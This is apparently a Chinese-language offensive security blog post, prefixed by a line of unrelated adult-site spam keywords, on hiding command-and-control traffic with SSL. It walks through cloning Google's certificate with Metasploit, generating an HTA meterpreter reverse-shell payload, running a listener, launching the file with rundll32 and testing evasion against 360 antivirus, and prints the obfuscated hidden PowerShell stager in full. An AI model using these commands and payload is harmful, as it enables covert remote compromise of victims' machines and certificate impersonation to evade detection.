大香蕉在线精品,中文字幕久久久久,操综合天天干,中文字幕一区二区三区四区50岁,亲子乱AⅤ一区二区三区下载,影音先锋色一区二区,亚洲天堂在线官网,久久艹免费视频

點(diǎn)擊藍(lán)字關(guān)注我哦

前言

混淆是混淆不過人為分析的，只有加密才是yyds，而ssl加密是最常用的加密手段，比如c2上個(gè)ssl證書，配合一個(gè)aws

Amazon CloudFront 高度可信域名（也可以配合域前置，cloudflare是個(gè)不錯(cuò)的選擇，最好去namesilo.com注冊(cè)域名，能免費(fèi)保護(hù)隱私），然后就嗯嗯啊啊啊，你懂的

基礎(chǔ)知識(shí)

.csr-這是證書簽名請(qǐng)求。某些應(yīng)用程序可以生成這些文件以提交給證書頒發(fā)機(jī)構(gòu)。實(shí)際格式為PKCS10，它在RFC 2986中定義。它包括所請(qǐng)求證書的一些/全部密鑰詳細(xì)信息，例如主題，組織，狀態(tài)，諸如此類，以及要簽名的證書的公共密鑰。這些由CA簽名并返回證書。返回的證書是公用證書（包括公用密鑰，但不包含專用密鑰），其本身可以有兩種格式。

.pem-在RFC 1421至1424中定義，這是一種容器格式，可以只包含公共證書（例如Apache安裝和CA證書文件/etc/ssl/certs），或者可以包括完整的證書鏈，包括公共密鑰，私鑰和根證書。令人困惑的是，由于PKCS10格式可以轉(zhuǎn)換為PEM ，因此它也可能對(duì)CSR進(jìn)行編碼。該名稱來自“ 隱私增強(qiáng)郵件（PEM）”，這是一種用于保護(hù)電子郵件的失敗方法，但是其使用的容器格式仍然存在，并且是x509 ASN.1密鑰的base64轉(zhuǎn)換。

.key-這是PEM格式的文件，僅包含特定證書的私鑰，僅是常規(guī)名稱，而不是標(biāo)準(zhǔn)化名稱。在Apache安裝中，該位置通常位于中/etc/ssl/private。這些文件的權(quán)限非常重要，如果設(shè)置錯(cuò)誤，某些程序?qū)⒕芙^加載這些證書。

.pkcs12 .pfx .p12-最初由RSA在“ 公鑰密碼標(biāo)準(zhǔn)”（縮寫為PKCS）中定義，“ 12”變體最初由Microsoft增強(qiáng)，后來提交為RFC 7292。這是包含公共和私有證書對(duì)的密碼容器格式。與.pem文件不同，此容器是完全加密的。Openssl可以使用公鑰和私鑰將其轉(zhuǎn)換為.pem文件：openssl pkcs12 -in file-to-convert.p12 -out converted-file.pem -nodes。

這次用的的就是pem文件，包含了一個(gè)完整的證書鏈，簡(jiǎn)單方便使用。

使用

首先得拿到一個(gè)比較nice的pem文件，使用kali中的Impersonate_SSL模塊，該模塊通過選項(xiàng)中提供的經(jīng)過身份驗(yàn)證的源的SSL證書創(chuàng)建本地副本，可以在提供SSLCert選項(xiàng)的Metasploit的所有模塊中使用。

use auxiliary/gather/impersonate_sslmsf6 auxiliary(gather/impersonate_ssl) > set rhost  www.google.comrhost => www.google.commsf6 auxiliary(gather/impersonate_ssl) > run

這里我使用了代理，然后就獲得google證書副本

生成木馬文件，好像msfvenom不提供證書選項(xiàng)，所以只能老老實(shí)實(shí)的用msfconsole了

msf6 > use windows/meterpreter/reverse_tcpmsf6 payload(windows/meterpreter/reverse_tcp) > set lhost 192.168.75.131lhost => 192.168.75.131msf6 payload(windows/meterpreter/reverse_tcp) > set lport 443lport => 443msf6 payload(windows/meterpreter/reverse_tcp) > set StagerVerifySSLCert trueStagerVerifySSLCert => truemsf6 payload(windows/meterpreter/reverse_tcp) > set handlersslcert /root/.msf4/loot/20210326024706_default_172.217.26.132_172.217.26.132_p_760535.pemhandlersslcert => /root/.msf4/loot/20210326024706_default_172.217.26.132_172.217.26.132_p_760535.pemmsf6 payload(windows/meterpreter/reverse_tcp) > generate -f hta-psh -o /root/patch.hta

設(shè)立監(jiān)聽：


msf6 exploit(multi/handler) > set paylod windows/meterpreter/reverse_httpspaylod => windows/meterpreter/reverse_httpsmsf6 exploit(multi/handler) > set lhost 192.168.75.131lhost => 192.168.75.131msf6 exploit(multi/handler) > set lport 443lport => 443msf6 exploit(multi/handler) > set StageVerifySSLCert trueStageVerifySSLCert => truemsf6 exploit(multi/handler) > set hanlersslcert /root/.msf4/loot/20210326024706_default_172.217.26.132_172.217.26.132_p_760535.pemhanlersslcert => /root/.msf4/loot/20210326024706_default_172.217.26.132_172.217.26.132_p_760535.pemmsf6 exploit(multi/handler) > run

把生成hta文件拖到虛擬機(jī)，首先在沒有360安全衛(wèi)士和360殺毒的情況下進(jìn)行測(cè)試。

rundll32.exe url.dll,OpenURL “patch.hta”

分析流量：從這里開始

就開始用ssl加密流量了。

后續(xù)安裝了360安全衛(wèi)士，360殺毒，靜態(tài)無法查殺此hta馬。

但是執(zhí)行行為過不了，因?yàn)槠饰龃蝖ta馬，也是通過powershell去執(zhí)行命令

把powershell要執(zhí)行的base64字符串解碼，發(fā)現(xiàn)，其繼續(xù)內(nèi)嵌powershell

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAHWIXWACA7VWbW/iOBD+3Er9D9EKKYkuhfCi3W2llc6BBugSCoR3Fq3cxICLE9PEgXJ7+99vDEnbvbZ3uyddBMKxZ8Yzz/N4zCIJPUF5qPyxU76dnZ50cIQDRcvxO3NhKLmkXapz/eQEVnKL7Vj5pGgztNnUeIBpOL+8rCZRREJxfM/XiUBxTIJbRkms6cqfymhFInJ+c3tHPKF8U3Jf83XGbzFLzfZV7K2Ico5CX661uIdlMnl3w6jQ1C9fVH12Xpznr+4TzGJNdfexIEHeZ0zVle+63LC/3xBNdagX8ZgvRH5Ew3IpPwhjvCBtiLYlDhEr7seqDkXAJyIiiUJFliP9j6uaCsNOxD3k+xGJY9VQZjLybD7/XZul2/aSUNCA5JuhIBHfuCTaUo/E+QYOfUZ6ZDEHL1dENFzOdR3MtnxNtFyYMGYovxJGa5NdBtrPOmnPncCqIyLdACJflulwP2Hk6Ki+kueBex2eR/4Bue9np2eni0wsvLenz+UCo5PZYUwgPa3DY3qw+6SYhuLATljwaA+vuX6UEH3+CK6SI+vrsWW8HaCYWYMt70kFzoac+nPwSAnN+cVuT86/LcwaWdCQ1PYhDqiXaU97DWayYORQYz4za0NOmpouEL9GGFliIZGTbL9wuwqoePS1Esp8EiEPqIohK2BR/zGZIxma2gwdEgBGx3eQX24BiieZdaryfba7fAcjtcpwHBtKJ4Ej5xmKSzAjvqGgMKbpEkoEPwzVp3SdhAnq4Vhk4eZ6hmO6X5WHsYgSD2iD2vvuhngUMwmFoTSoT6y9S5fZvuqrQFQxY3ASINIWiIAZCYArpBgiSPFIvJ53iWgGG0YCMDocfpvhJRz1VPAH+eAl8dW/p5gp+ihfCUaGwrMEgWGXcWEoQxoJ6CESWFDRf9z+Wfc4JFKNSMqFlh2RmbUXUti5ze3t1zupyhSZAw6RAAzsiAcWjsn7yrFXaO8KN7SD4Jk0Q+b412tabO7g68B34Cx+a3l02REmDxyvGnfq9kdEd8ud97GNPP/aJxfusCLcq6aodlCjS02rsvIssw/jQVNMmk3RrKNGf+Uxs1NrFNxJbNJdYyRjHWN4lUpjbKJyuXJTNtcA3YQWl2vktwO6e2jBGJriTctqxpbZZFfX1d7tqGRPR6xRqNirxYjH7vtJrVAoXPi45uwRsrhfdvbjYo/3G15gVUJeuKhW1ugKoWp4NbQt/nliRahTGOLlhu8+r1rL0rKKUP0DJdPuwLa6XdtCg/rdfe2isCxcjMZ4ZY2GJTrdjHsreLd3ja5TMCtNnzzwj60RHW5lLOvesqdjjFrTvV0oFCdxCa8tjiwA1p7eo/pqsrE7DPz7gxJHQ9Z+su02ap+9afFD7Hx6J4kGpnP07v4ZfW/1XwdH8QozoBU6a3acbB7ZaavscCo9NA3u1zWJQsLgdoL7KxMkYox7slEfWipcEsfWLW+SAQzLpVdHuvJoqD918Gzq8nIKOYLGDxrMt0i4FCvDfCibJrRj86FiQo0/X1iVb/baMZYh+7lE5jE4OwTXpfRzu+1N+H9Clh63Ffz4/wbZ09w/rP4UjKZxKPjF7I8Tv4ToL9Y9wlSAnQu9gpHjffV6+ak4nt3pkhJgfpE+8i/ZTSLO23DVn53+Bc0wY038CQAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);